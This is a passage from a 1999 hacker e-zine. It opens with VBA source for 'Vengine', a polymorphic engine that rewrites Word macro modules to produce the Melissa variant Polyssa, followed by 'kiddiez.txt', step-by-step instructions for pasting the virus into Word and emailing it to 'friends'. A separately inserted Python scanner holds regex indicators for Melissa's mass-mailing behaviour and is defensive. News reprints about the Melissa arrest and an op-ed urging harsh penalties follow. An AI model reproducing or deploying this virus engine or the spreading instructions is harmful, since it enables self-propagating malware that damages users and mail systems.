         QC2cz(12) = "To6dm"
         QC2cz(13) = "Rg4mp"
         QC2cz(14) = "I4h"
         QC2cz(15) = "I6w"
         QC2cz(16) = "Gy0u"
         QC2cz(17) = "S5l"
         QC2cz(18) = "T1g"
         QC2cz(19) = "T1b"
         QC2cz(20) = "Ba6Dk%"
         QC2cz(21) = "X1U%"
         QC2cz(22) = "C6E%"
         QC2cz(23) = "C6z%"
         QC2cz(24) = "X6q"
         QC2cz(25) = "XM2wj"
         QC2cz(26) = "Yx1h"
         QC2cz(27) = "Sh6k"
         QC2cz(28) = "T2w"
         QC2cz(29) = "Ky8c"
         ' [add your entries here!]
       End Sub
       Private Sub Infect(Co6q, X3X)
       ReDim Zy7td(0)
       ReDim QC2cz(0)
       ReDim K1j(0)
       Dim R0e As String
       For I = 1 To Co6q.CountOfLines
       R0e = Co6q.Lines(I, 1)
       If Trim(R0e) <> "" Then T2w R0e, 1
       Next I
       Tq4tl
       X3X.DeleteLines 1, X3X.CountOfLines
       X3X.AddFromString ""
       For I = 1 To Co6q.CountOfLines
       R0e = Co6q.Lines(I, 1)
       If Trim(R0e) <> "" Then
       Nv4cl = ""
       T2w R0e, 2
       If Rnd < 0.1 Then Nv4cl = Nv4cl + " ' " + "T1b"
       X3X.InsertLines X3X.CountOfLines + 1, Nv4cl
       End If
       Next I
       End Sub
       Private Sub Sh6k(To6dm As String, Rg4mp As Integer)
       G4u = Left$(To6dm, 1) = Chr$(34) And Right$(To6dm, 1) = Chr$(34) And Len(To6dm) > 2
       If G4u Then To6dm = Mid$(To6dm, 2, Len(To6dm) - 2)
       I4h = UCase$(Left$(To6dm, 1)) >= "A" And UCase$(Left$(To6dm, 1)) <= "Z"
       Ky8c = UCase$(Right$(To6dm, 1))
       If Rg4mp = 1 Then
       If I4h Then
       For Ba6Dk% = 1 To UBound(Zy7td)
       If To6dm = Zy7td(Ba6Dk%) Then Exit Sub
       Next Ba6Dk%
       ReDim Preserve Zy7td(UBound(Zy7td) + 1)
       Zy7td(UBound(Zy7td)) = To6dm
       End If
       Exit Sub
       End If
       If I4h Then
       For Ba6Dk% = 1 To UBound(QC2cz)
       If To6dm = QC2cz(Ba6Dk%) Then
       To6dm = K1j(Ba6Dk%)
       If Ky8c < "A" Or Ky8c > "Z" Then To6dm = To6dm + Ky8c
       Exit For
       End If
       Next Ba6Dk%
       End If
       If G4u Then To6dm = Chr$(34) + To6dm + Chr$(34)
       If Nv4cl <> "" Then
       If Right$(Nv4cl, 1) <> "." And Left$(To6dm, 1) <> "." Then To6dm = " " + To6dm
       End If
       Nv4cl = Nv4cl + To6dm
       End Sub
       Private Sub Tq4tl()
       InfectTable
       ReDim Preserve K1j(UBound(QC2cz))
       For Ba6Dk% = 1 To UBound(K1j)
       I6w:
       Gy0u = Int(Rnd * 3) + 3
       S5l = ""
       For X1U% = 1 To Gy0u
       T1g = Chr$(97 + Int(Rnd * 26))
       If X1U% = 1 Or Rnd > 0.8 Then T1g = UCase$(T1g)
       If X1U% = 1 + Int(Gy0u / 2) Then T1g = Chr$(48 + Rnd * 9)
       S5l = S5l + T1g
       Next X1U%
       For X1U% = 1 To UBound(Zy7td)
       If S5l = Zy7td(X1U%) Then GoTo I6w
       Next X1U%
       For X1U% = 1 To Ba6Dk% - 1
       If S5l = K1j(X1U%) Then GoTo I6w
       Next X1U%
       K1j(Ba6Dk%) = S5l
       Next Ba6Dk%
       End Sub
       Private Sub T2w(R0e As String, Rg4mp As Integer)
       Dim To6dm As String
       Dim T1g As String
       Do
       R0e = LTrim(R0e)
       XM2wj = False
       If Len(R0e) = 0 Then Exit Do
       C6E% = 1
       T1g = UCase$(Left$(R0e, 1))
       X6q = (T1g >= "A" And T1g <= "Z") Or (T1g >= "0" And T1g <= "9")
       Do
       If C6E% > Len(R0e) Then Exit Do
       T1g = Mid$(R0e, C6E%, 1)
       If T1g = Chr$(34) Then
       If XM2wj Then C6E% = C6E% + 1: Exit Do
       XM2wj = True
       End If
       If Not XM2wj Then
       If X6q Then
       If T1g = "$" Or T1g = "%" Or T1g = "&" Then C6E% = C6E% + 1: Exit Do
       If T1g = "!" Or T1g = "#" Then C6E% = C6E% + 1: Exit Do
       End If
       Yx1h = UCase$(T1g) >= "A" And UCase$(T1g) <= "Z"
       Yx1h = Yx1h Or (T1g >= "0" And T1g <= "9") Or T1g = "_"
       If X6q <> Yx1h Then Exit Do
       If T1g < Chr$(33) Or T1g > Chr$(127) Then Exit Do
       End If
       C6E% = C6E% + 1
       Loop
       To6dm = Left$(R0e, C6E% - 1)
       R0e = Right$(R0e, Len(R0e) - (C6E% - 1))
       If Left$(To6dm, 1) = "'" Or To6dm = "Rem" Then Exit Do
       Sh6k To6dm, Rg4mp
       Loop
       End Sub
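
A defender's counterpart to the engine above, added here as an example and
not part of this issue or of VeggieTailz's code: Vengine only renames what is
in InfectTable and strips comments, so the Office/Outlook calls, the registry
path and the unlisted string literals in Polyssa2.txt are identical to those in
Polyssa.txt, and a scanner can key on them instead of on names. The macro
excerpts in it are constructed, and the Vengine-name regex, keyword list and
score thresholds are my own assumptions.

```python
"""Rename-invariant triage for Melissa/Polyssa-style Word macros.

Added example, not part of the HWA issue or of VeggieTailz's code.  Vengine
renames only the identifiers listed in InfectTable and drops comments, so the
Office/Outlook calls, the registry path and the unlisted string literals are
identical in every generation and can be matched directly.  Macro texts below
are constructed, abbreviated excerpts; the thresholds are assumptions.
"""
import re

# Behaviours that survive Vengine renaming.  Each pattern matches text that
# appears verbatim in both the Polyssa.txt and Polyssa2.txt listings.
INDICATORS = {
    "security_downgrade": r"Options\.VirusProtection\s*=",
    "word_security_key": r"Office\\9\.0\\Word\\Security",
    "outlook_automation": r'CreateObject\s*\(\s*"Outlook\.Application"\s*\)',
    "mapi_namespace": r'GetNameSpace\s*\(\s*"MAPI"\s*\)',
    "bulk_recipients": r"\.Recipients\.Add\b",
    "self_attach": r"\.Attachments\.Add\s+ActiveDocument\.FullName",
    "auto_send": r"\.Send\b",
    "vbproject_access": r"\.VBProject\.VBComponents\b",
    "module_rewrite": r"\.CodeModule\.(?:DeleteLines|InsertLines|AddFromString)\b",
}
INDICATORS = {k: re.compile(v, re.IGNORECASE) for k, v in INDICATORS.items()}

# Shape of the names Tq4tl generates: 3 to 5 characters, capital first letter,
# one digit at position 1 + Int(len / 2), letters elsewhere.  Sh6k's suffix
# rule re-appends the original name's last character when it is not a letter,
# so a trailing digit carries over (ADI1 became Td7x1 in Polyssa2.txt).
VENGINE_NAME = re.compile(r"^[A-Z](?:[0-9][A-Za-z]|[A-Za-z][0-9][A-Za-z]{1,2})[0-9]?$")
IDENT = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*")
VBA_KEYWORDS = {w.lower() for w in (
    "Private Public Sub Function End If Then Else ElseIf Dim Set As String Integer "
    "Long For To Next Do Loop Exit GoTo On Error Resume Randomize True False And "
    "Or Not ReDim Preserve Rem Call With Each In Step Until While Wend Const").split()}

def strip_strings_and_comments(line):
    """Blank out string literals and cut the line at a comment apostrophe."""
    out, in_str = [], False
    for ch in line:
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            break
        out.append(" " if in_str or ch == '"' else ch)
    return "".join(out)

def identifier_stats(src):
    """Return (distinct non-keyword identifiers, how many look Vengine-made)."""
    names = set()
    for line in src.splitlines():
        for m in IDENT.finditer(strip_strings_and_comments(line)):
            if m.group(0).lower() not in VBA_KEYWORDS:
                names.add(m.group(0))
    return len(names), sum(1 for n in names if VENGINE_NAME.match(n))

def triage(src):
    """Score one macro module.  The indicator list is identical across Vengine
    generations; the name heuristic additionally flags scrambled output."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(src))
    total, generated = identifier_stats(src)
    score = len(hits) + (2 if generated >= 5 else 0)
    verdict = "melissa_family" if score >= 6 else "suspicious" if score >= 3 else "clean"
    return {"indicators": hits, "identifiers": total,
            "vengine_shaped": generated, "score": score, "verdict": verdict}

# Constructed, abbreviated excerpt with the first-generation names.
MELISSA_GEN1 = r"""
Private Sub OldMelissaCode()
Options.VirusProtection = (1 - 1)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
BreakUmOffASlice.Recipients.Add Peep
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
End Sub
"""

# The same excerpt as Vengine rewrote it in Polyssa2.txt (constructed).
POLYSSA_GEN2 = r"""
Private Sub Lm2jv()
Options.VirusProtection = (1 - 1)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Set Rm4gU = CreateObject("Outlook.Application")
Set K0t = Rm4gU.GetNameSpace("MAPI")   ' T1b
Xy9ti.Recipients.Add J2P
Xy9ti.Attachments.Add ActiveDocument.FullName   ' T1b
Xy9ti.Send
Set Td7x1 = ActiveDocument.VBProject.VBComponents.Item(1)
If B6r > 0 Then Td7x1.CodeModule.DeleteLines 1, B6r
End Sub
"""

if __name__ == "__main__":
    for label, src in (("Polyssa", MELISSA_GEN1), ("Polyssa2", POLYSSA_GEN2)):
        print(label, triage(src))
```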
       
         
       
       -0-
       kiddiez.txt
                -0-
                
        
       Okay, so you can't program even BASIC, and you just want a copy of
       the virus to play with.  Here's how:
       
       
       1. Open up Microsoft Word
       2. Press ALT-F11, which will pop up the VBA editor
       3. In the "Project" window, you'll see "Project (Document1)".
       4. Find "Microsoft Word Objects", then "ThisDocument" under that.
       5. Double-click on "ThisDocument".  Delete any text that shows up
          in the editor (on the right-hand side).
6. Open Polyssa2.txt with Notepad.  From the "Edit" menu, choose
          "Select All", followed by "Copy".
       7. Go back to your "Microsoft Visual Basic" window, and click
          on the right-hand window again (below where it says "(General)" or
          something at the top).  Then click "Paste".
       8. Press ALT-Q to return to Microsoft Word.  Save your new document.
       9. E-mail it to all your "friends".
       10. Pat yourself on the back; you have successfully followed directions
           at least once in your miserable little life.
       
       -VeggieTailz        


 N.B.: The original Melissa code was included in last issue and won't be
      reprinted here. - Ed

        @HWA
        
 18.1  [ISN] Virus camp split over melissa virus bust 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Sun, 4 Apr 1999 06:18:33 -0600 (MDT) 
       From: mea culpa <jericho@dimensional.com> 
       To: InfoSec News <isn@repsec.com> 
       Subject: [ISN] Virus writers' community split by arrest 
            
       
       Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
       
       
       NEW YORK (AP) [4.2.99] - The close-knit underground of computer virus
       creators split into two camps at the news that one of their own may have
       been arrested for releasing malicious Melissa. 
             
       ``The whole community has really been shaken up by this,'' said B.K. 
       Delong, who follows the virus scene. ``The first group is one that wants a
       better reputation. Then there's the community that wants to retaliate and
       come up with even more destructive viruses.''
             
       Virus creators gather at the Virus Exchange Underground, a computer chat
       area where they swap ideas and gossip. Most are programmers interested in
       viruses and computer bugs. They often write viruses and swap them among
       themselves, Delong said.
             
       They refer to themselves as ``Black Hats,'' interested in doing damage,
       and ``White Hats.'' The Black Hats sometimes release viruses through
       e-mail or Usenet newsgroups.
             
       In a statement released on behalf of the VX Underground, as it's often
       called, the group warned the media and investigators not to quickly
       condemn the author of Melissa.
             
       ``Instead they should be more interested in the person who released the
       bug which caused the spread of the virus,'' said the statement, which was
       e-mailed to The Associated Press.
             
       Melissa was originally posted on two sex discussion groups a week ago
       Friday, according to an online search. The VX Underground said it was
       highly unlikely those two posts out of thousands could have led to
       Melissa's vicious cascade.
             
       ``However, once released others posted the Melissa source code to
       additional newsgroups, Web sites and listservs (mailing lists), which
       meant anyone could turn it into the virus and continue to spread it,'' the
       statement continued.
             
       David L. Smith, 30, of Aberdeen, N.J., was arrested Friday and charged
       with originating the destructive Melissa, which infected hundreds of
       thousands of computers and swamped hundreds of companies' e-mail systems.
             
       Computer experts used unique identification numbers embedded in Microsoft
       Word documents to trace Melissa back to a well-known virus writer who
       calls himself VicodinES.
             
       Rita Malley, spokeswoman for the New Jersey state attorney general's
       office said Smith was ``definitely not'' the person known by that handle.
       Instead, Smith took two viruses, one of which came from VicodinES, and
       combined them with another virus to create Melissa, she said.
             
``They (the Black Hat programmers) are looking for someone to blame,''
said Delong. ``They resent the treatment VicodinES supposedly received at
the hands of the media, and they're rallying around their own. They said
he is a really nice guy.''
       
       
       -o-
       Subscribe: mail majordomo@repsec.com with "subscribe isn".
       Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

        @HWA
 
 18.2  [ISN] The Anarchic Lure of Virus Writing ...
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       NYTIMES;

       http://www.nytimes.com/library/tech/99/04/biztech/articles/03virus.html
       
       April 3, 1999
       The Anarchic Lure of Virus Writing
       By MATT RICHTEL and JOHN MARKOFF
       
       
       In the world of cyberspace, the sport of virus writing has become the
       latter-day equivalent of the urge to write "Kilroy was here" on the wall
       of the school auditorium. And it is a hobby with a growing following. 
       
       
       The emergence of the Melissa virus a week ago, and the announcement
       yesterday of an arrest in the case, underscores the growth on the Internet
       of a community of virus writers and collectors. They freely trade
       malicious code, combine efforts to best the work of antivirus researchers,
       and post their creations on the Internet for anyone to download and
       release into the wild. 
       
       
       "It's like candy," said Sarah Gordon, an antivirus researcher for I.B.M. 
       who spent five years researching the virus-writing subculture. "A child
       can get these, a 12-year-old can get these." She said it required little
       technical expertise to introduce a virus once it was obtained. 
       
       
       "It's trivial," she said. "All you do is download it to a computer, click
       on it and there you go." 
       
       
       As the computer has become ubiquitous, the image of the bad guy of the
       technology era, the bespectacled introvert who attacks computer networks
       by keystroke, has emerged. Within this category, there exists a subset of
       virus writers, a subculture within the subculture. 
       
       
       The International Computer Security Association, an industry corporation
       based in Carlisle, Pa., estimated last year that there were 15,000 to
       20,000 viruses in circulation, with 1,000 emerging each month. Only a
       small number are widely circulated, or "make it into the wild," in the
       industry vernacular. 
       
       
       But their proliferation has given rise to a highly competitive industry of
       companies that seek out the latest strains and find and market software
       antidotes. 
       
       
       Over the years, virus writing has been perceived as having less status in
       the hacker set than cracking into government and corporate computers. But
       virus writing appears to have become more attractive to hackers as
       publicity around viruses has grown, say computer buffs and executives at
       antivirus companies. 
       
       
       One early group of virus writers, 40Hex, which published a magazine,
       emerged in the early 1990's, said Jeff Moss, the founder of Defcon, an
       annual gathering of the computer underground. "They were going to cause
       the downfall of civilization, but then they got bored after a while," 
       Moss said. 
       
       
       "There wasn't that much happening in virus writing," he added, "so the
       more motivated people went off to normal hacking." As opposed to hacking,
       which can demand a range of skill levels, virus writing traditionally
       attracted a more technically oriented set. Virus writers "are very much
       into super-down-and-dirty programming," Moss said. 
       
       
       But in recent years, virus writing has experienced a resurgence, generally
       attracting a less technically adept group. Increasingly, simple templates
       are available for use in virus writing and breaking into computers, making
       the endeavor open to copycats and less adept programmers. 
       
       
       In the underground, these copycats are known as script kiddies. In the
       world of virus writing, they are termed scripters, a name Ms. Gordon gave
       to them. 
       
       
       Ms. Gordon said virus-writing enthusiasts had evolved from the late 80's. 
       
       
       "It used to be a small group of people with these interests," she said. 
       "With the advent of the Internet, the community has widened and
       accessibility of applications to young people has increased." 
       
       
       That may have particular currency in the case of the Melissa virus. Some
       computer security experts have suggested that David L. Smith, the New
       Jersey man arrested in the case yesterday, cobbled together his own virus
       code with virus templates he found on the Web. 
       
       
       Authorities in New Jersey said they did not believe that Smith is the
       virus writer known as VicodinES, whose handle has been linked in Internet
       postings with the creation and dissemination of Melissa. What is certain
       is that VicodinES, whoever he or she is, has a Web site that advocates the
       creation and use of viruses, and that Smith's name was found in several
       documents on that Web site dating back at least a year, said Richard
       Smith, an independent software developer in Cambridge, Mass., who is an
       amateur computer sleuth. 
       
       
       The Web site, which was taken down on Tuesday night by Access Orlando, the
       Internet service provider in Orlando, Fla., where the Web server was
       situated, served as a bulletin board and downloading site for viruses. It
       contained commentary by the author who identified himself as VicodinES. 
       
       
       But some virus writers contend that it is far too simplistic to
       characterize all virus writers as malicious. Some are attracted to virus
       writing because they want to deconstruct programming code, see how it
       works, and poke holes in it as an intellectual endeavor, said a longtime
       virus writer known as Attitude Adjuster. 
       
       
       "The idea that all of us out here are malicious teen-agers is quite a
       fallacy," said Attitude Adjuster, who was contacted by E-mail and declined
       to give his real name. "There are those of us who still exist in the
       community who write viruses because it's fun. We don't give our viruses to
       the public and nobody gets hurt." 
       
       
       -o-
       Subscribe: mail majordomo@repsec.com with "subscribe isn".
       Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
       
       @HWA

 18.3  A shadowy bunch...Philly Inquirer
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
  http://www.phillynews.com/inquirer/99/Apr/04/front_page/VIRU04.htm

       In virus arrest, a glimpse of a shadowy bunch 
       
       
       Across the country, young men are found sharing recipes for inflicting mayhem
       on computers. 
       
       
       By David Cho
       INQUIRER SUBURBAN STAFF
       
       
       David L. Smith has been arrested and identified by investigators as the
       man who unleashed Melissa on the computer world, but finding the virus'
       original creators -- members of a society of young hackers cloaked behind
       aliases and trails of code -- will be substantially harder. These hackers
       are likely to be the source, computer experts say, of future, and perhaps
       more dangerous, viruses.
       
       
       And it is these virus creators -- some as young as 14 -- that the FBI is
       now pursuing in investigations spanning the country. One member of the
       virus-making community, through his Web site, provided Smith with the
       necessary information to create and distribute his virus, authorities
       said.
       
       
       The FBI confirmed that it is still investigating the Melissa virus case.
       It is following leads based on information gathered from small Internet
       companies in Florida and Tennessee, according to officials at those
       companies. Considered unwitting hosts to Web sites that contained recipes
       for viruses, the companies are not implicated in creating or spreading the
       viruses, authorities said. 
       
       
       Smith, of Aberdeen, N.J., was arrested Thursday night. He was charged with
       releasing the virus, which affected the e-mail accounts of at least
       100,000 computers in its first five days. America Online technicians, in
       cooperation with federal agents, tracked Smith to his Monmouth County
       home.
       
       
       Through his lawyer, Smith, 30, a freelance programmer, denied any
       wrongdoing.  He was released on $100,000 bail.
       
       
       "The computer world is a world where people do things, experimental
       things, just about every day," said Smith's lawyer, Steven Altman.
       "Nothing he did, or intended to do, had a premeditated or wrongful
       intent." 
       
       
       Altman described his client as "very upset, scared and nervous. This has
       been a horrible ordeal."
       
       
       Even while refusing to release Smith's computer pseudonym, authorities
       said he was not the man behind the pseudonym, VicodinES, who is believed
       to have created the virus that Melissa was based on. VicodinES, taken from
       the name of a narcotic painkiller, frequently appears in online chat rooms
       of the virus-writing community, which calls itself the Virus Exchange.
       
       
       The problem with catching virus makers is that they work in a clandestine
       corner of cyberspace, making them difficult to track in the real world.
       They do not trust outsiders to enter into their chat rooms and almost
       never reveal their true identities. They keep their chat rooms closed
       through several techniques, by hiding behind codes or by unleashing
       miniviruses that will shut out unwanted guests.
       
       
       One man who has the trust of virus-writing circles is B.K. Delong, a Web
       consultant based in Boston. From listening to online discussions, Delong
       said the Smith arrest had thrown the virus-making community into chaos.
       Closed-door meetings were held in online chat rooms that even Delong was
       not privy to.
       
       
       The Virus Exchange, Delong said, basically has two kinds of people --
       those who simply enjoy creating and exchanging virus programs as a
       demonstration of their skills, and those who steal viruses and release
       them into the general population.
       
       
       Smith's arrest exacerbated that divide, Delong said. Some "spreaders" were
       so upset that they threatened to release viruses "that could pretty much
       destroy anything on your computer," Delong said. Melissa was relatively
       benign, they said, compared to the havoc they can wreak. 
       
       
       The "good" side of the community, though, is trying to redeem its
       reputation, Delong said. In an unusual collective statement, members of
       the Virus Exchange community said that Smith might have created Melissa,
       but he alone could not have been responsible for its rapid spread.
       
       
       "The media and investigative authorities should not be so quick to condemn
       the author of the Melissa bug," the statement said. "Instead they should
       be more interested in the person who released the bug which caused the
       spread of the virus. VicodinES has initially been blamed for the creation
       and spread of the Melissa Virus when in fact, he was not at fault."
       
       
       Delong added that no one in the community knows for sure whether Smith is
       VicodinES. "It's really hard to tell. He may not be known in the
       community, but then again he may be very well known in it," he said. "It
       all depends on when we figure out his nickname." 
       
       
       For investigators, breaking open the Melissa case had the effect of
       bringing at least one hacker -- an unidentified man in his 20s who lives
       near Kingsport, Tenn. -- to the attention of the FBI. Two months ago, that
       man asked a young local Internet company called Global Connection to host
       a Web site for him.
       
       
       Dennis Halsey, the CEO and vice president of Global Connection, said he
       did not think anything of the request at the time. In fact, Halsey did not
       require any formal application and never checked to see what the Web site
       was. Neither Halsey nor the FBI would release the man's name.
       
       
       The site turned out to be Codebreakers.org -- one of the main places that
       virus creators use to trade code. "We never imagined it to be something
       this big, believe me," said Halsey, who described the man as a computer
       wizard.
       
       
       Halsey, who is not implicated in the case, said he knew the man only
       because "it's a small town and everybody sort of knows each other." But
       Halsey thought it was inconceivable that such a young man could be the
       infamous VicodinES or another prominent virus maker. "I'm sure that he is
       not the one who wrote the virus," Halsey said. "I mean, this is a
       multinational organization, there are members everywhere. How could this
       young kid be involved?"
       
       
       Cary Nachenberg, the chief researcher at the Symantec antivirus research
       center in Cupertino, Calif., said virus-writing societies, such as
       Codebreakers and VLAD, often drew young men from the most unexpected
       places.
       
       
       "Typically they are all male, teens to mid-20s, computer literate and too
       much time on their hands," Nachenberg said. "But the good thing is as they
       grow up and find something else to do, they usually stop writing viruses."
       
       
       About the same time investigators were questioning Halsey in Tennessee, an
       FBI team in Orlando, Fla., was confiscating a computer server that
       supported SourceofKaos, a Web site authored by VicodinES.
       
       
       Investigators have said that Smith downloaded a virus from that site and
       then added his own touch to create Melissa. The server was operated by
       Roger Sibert, who rented it from a small Internet company called Access
       Orlando.
       
       
       Sibert, whose server was dedicated to freedom of speech and anti-Microsoft
       issues, does not know who VicodinES is, but said he had exchanged e-mail
       messages a couple of times. Sibert added that he was cooperating with
       investigators.
       
       
       Meanwhile, Alan McGinn, the president of Access Orlando, said the server
       computer was in the hands of federal agents who believed it had telling
       clues to the origins of SourceofKaos and the identity of the enigmatic
       VicodinES. 
       
       
       http://www.phillynews.com/inquirer/99/Apr/04/front_page/VIRU04.htm
       
       @HWA
 
  18.4  Very inflammatory article: "Hang Hackers Like Coin Clippers"      
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
        http://www.nationalpost.com/commentary.asp?f=990407/2456715
                                                                                                     
       The National Post: Montreal, CANADA


                                       Wednesday, April 07, 1999

      Hang hackers like coin clippers 

      Christy McCormick
      National Post 

      If one takes a utilitarian approach to sentencing, then hanging cyber
      bandits for launching computer viruses like Melissa to disable e-mail
      will be useful in discouraging others. 

      To many, executing hackers is like hanging coin clippers in the 18th
      century or horse thieves in the 19th. It seems such an over-reaction. 

      Simply shearing a sliver of silver from a passing shilling doesn't seem
      rope-worthy. Nor, from today's perspective, does horse stealing. 

      But knowledge hardens hearts. Coin clippers drove out good money
      from the market and threatened economic collapse in Britain. It had
      to be stopped and clippers were hanged briskly until it was. 

      In the wild west of America, a man without a horse was a man
      without a living. In a land with little charity and less welfare, his
      livelihood and life were threatened. Culprits received corresponding
      severity. 

      Callow geeks who threaten the world's e-mail and computer systems
      can be viewed benignly. High school hackers fiddling with macros on
      their own computers then prankishly sending them off into
      cyberspace seem like little more than boyish pranks. 

      But just as the 18th-century coin clipper threatened economic chaos,
      and the horse thief caused dangerous economic distress to the
      individual, today's hacker, who produces crippling viruses, threatens
      the system upon which the democratic world depends. 

      While detection and/or protection is desired to bring the problem to
      heel, savage penalties will do in the meantime. Such severity will at
      least separate the dilettante from the fellow who feels that wrecking
      the Internet is his calling, and thus will reduce the numbers in the
      field. 

      Admittedly, we shall put some cute kids into jail for a very long time
      or have them extradited to parts of the world they damaged, probably
      parts that care less about their welfare than we do. 

      Capital punishment may be a bit much, except in Texas, Florida, and
      Louisiana, but whatever severity can be meted out by any jurisdiction
      should be seriously considered wherever a hacker is convicted. 

      Harsh penalties are the traditional response in societies that find
      arresting culprits difficult because of an inadequacy in policing. So
      until things improve on that front, and cyber crime becomes less of a
      menace, hard sentencing is an appropriate quick fix. 

      Some think this old-fashioned, but old-fashioned society was no more
      bloody-minded than we are. The problem was inadequate policing and
      protection. It was nearly impossible to catch criminals in any number
      proportional to the crime rate in the days of the Bow Street Runner.
      That is why they made such examples of the criminals they did catch.

      Criminologists agree there is a correlation between higher catch rates
      and leniency in sentencing. But as we wait for improved policing
      and/or protection, the natural -- and perfectly wholesome -- response
      is to be extraordinarily harsh on those involved in such crimes. We
      should also be quite uncaring about their youth and unheeding of all
      but the most extraordinary extenuating circumstances. 

      The Duke of Wellington, commanding armies in the Peninsular War
      and later after Waterloo, hanged any soldier caught looting, even if he
      only took a chicken or a pig from a local farmer. The Iron Duke had
      little retributive feeling about this. There is a story about him
      promoting a looting private to corporal after the story the man told
      showed he was capable of fighting his way in a tight corner. But, in
      general, the duke was not easily charmed. He knew he had to stop
      the looting or it would spread and his army could not count on the
      good will of the population if he ever suffered a reverse and had to
      retreat over the same ground. (American forces attacking Quebec
      weren't so careful and grabbed every chicken and pig along the way.
      They suffered the horrors of Napoleon's retreat from Moscow, partly
      because the locals of Quebec and Maine hid everything from the
      retreating looters. It was a horror story that might have been prevented
      by a little judicious hanging early on.) 

      While severity has limitations and should never be substituted for a
      quest for good detection and protection, it has a value and should be
      employed in the interim. If the West could overcome its fretting over
      exculpating features of particular crimes and deal with the problem
      with utilitarian insensitivity, it would end up having less harm done to
      the cyber citizen tomorrow by being more severe with the cyber
      bandit today. 

      Christy McCormick is a Montreal journalist 
                                                                                                


       @HWA 
       
 18.5  Second victim, erh suspect fingered on Melissa virus in Europe...       
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
        http://www.zdnet.com/zdnn/stories/news/0,4586,2238568,00.html
       
       Did Smith author Melissa?

        Analyst claims to have found German virus
        author -- has alerted the FBI.

        By Luke Reiter, ZDTV
        April 8, 1999 12:12 AM PT 


       David L. Smith is set to appear in a New Jersey courtroom at 10:30 a.m. PDT 
       Thursday in connection with charges stemming from the Melissa virus outbreak.
       But now questions are being raised as to whether he is the actual author of 
       the virus.


       Jonathan James, an 18-year-old virus analyst from Sweden who's been helping 
       the FBI with its Melissa investigation, claims to have identified a second 
       suspect who he believes was involved in the creation of Melissa.

       James won't say much about this other suspect, but he will say that the second
       suspect is a male virus writer living somewhere in Europe -- and that he has 
       already told the FBI exactly where to find that suspect. 

       James also says that this virus writer speaks German, or some language that's
       derived from German. Parts of the Melissa source code include words that appear
       to come from a Germanic language.

       "I studied his source code and compared it to the Melissa virus source code, and
       I can see several similarities that are quite striking, and this thing with the 
       German or German-related variables," James said.

       Does that mean Smith, the 30-year-old programmer from Aberdeen, N.J., did not write 
       Melissa? James says he doesn't know. According to James, it looks like Smith was 
       involved in "posting" the virus, but that he may not be the actual author.

       Of course, not everyone agrees with James' analysis. Phar Lap Software President 
       Richard Smith, who's also provided information to the FBI, says this new European
       connection may be nothing major.  In fact, it might just be plagiarism.

       "The most simple explanation here is that the virus writer didn't know how to do
       e-mail from Word, and borrowed it from someone else," Smith said. "Just because 
       some code was written in German doesn't mean that that person was involved in the
       actual Melissa virus.  It looks more like that code was simply borrowed from them."

       Yet more info on Melissa including the legal ramifications can be found on ZDNet's
       cybercrime section.
       
        Related stories: http://www.zdnet.com/zdtv/cybercrime/
       
       Melissa Trail Leads to 'Ex' Virus Writer

       Site administrator says virus writer has gone into retirement, so why is his
        name at the center of the Melissa controversy?
       By Luke Reiter and Jim Louderback  

       The administrator whose site houses a page that may belong to the creator of 
       the Melissa virus told ZDTV that he has nothing to do with the virus, and that
       the potential creator "is in retirement." 

       Roger Sibert, systems administrator for Source of Kaos, a site frequented by
       virus enthusiasts, said that site log files showed that VicodinES had not been
       active on the site for 30 days. Code written by VicodinES has been linked to
       the Melissa virus, which has run wild on the Net since appearing Friday. 

       "Last I heard, he'd gone into retirement," Sibert told ZDTV Monday night. 

       The FBI has not contacted Sibert, but the administrator said he would cooperate
       with the bureau fully if they do. 

        "I'm not hiding anything," he said. Sibert said he and VicodinES have
        communicated through email and Internet Relay Chat forums. Sibert said he was
        impressed with VicodinES's code writing skills. 
       
       
       "He's probably talented enough to do it (the Melissa virus)," he said. 

       'Going into retirement'

        Sibert said he last communicated with VicodinES between eight months and a
        year ago, when VicodinES had requested that his page be made inactive, as he
        was going into retirement. 

        The Melissa virus contains a unique number -- the Global Unique Identifier, or
        GUID -- embedded in the header of an attached Microsoft Word file. That number
       points to the computer that created the Word document. ZDTV verified that the
       GUID number is the same as one contained in a virus called PSD2000.DOC,
       located on the site of a virus developer known as VicodinES. 

        However, the unique computer ID is stored in a Word document only once --
       when the document is created. Even if a document is copied to a new computer,
       and saved under a new name, the original GUID number does not change. 

       As any programmer knows, it's a lot easier to create a program by building on the
       work done by someone else. And VicodinES admits on his site that he built
       PSD2000.DOC based on a virus called Shiver. Shiver is the work of a virus
       developer calling himself ALT-F11. 

       ZDTV tracked down Shiver and checked its GUID, which also matched the one
       embedded in Melissa. In addition, another virus created by ALT-F11 (called
       Groovie2) also contains the same GUID as Shiver, Melissa and PSD2000. Because
       ALT-F11 claims to have written Groovie and Shiver, it's likely that the GUID in 
       all those viruses maps to his workstation. 

       A check of the other word macros created by VicodinES found that PSD2000.DOC
       was the only file with that GUID. All the others, which VicodinES claims he
       created, had a different GUID. 

       Melissa related to Shiver?

       What does all this mean? Whoever wrote Melissa built the virus around a Word file
       created on the same machine as Shiver.  Was this ALT-F11? Possibly, because
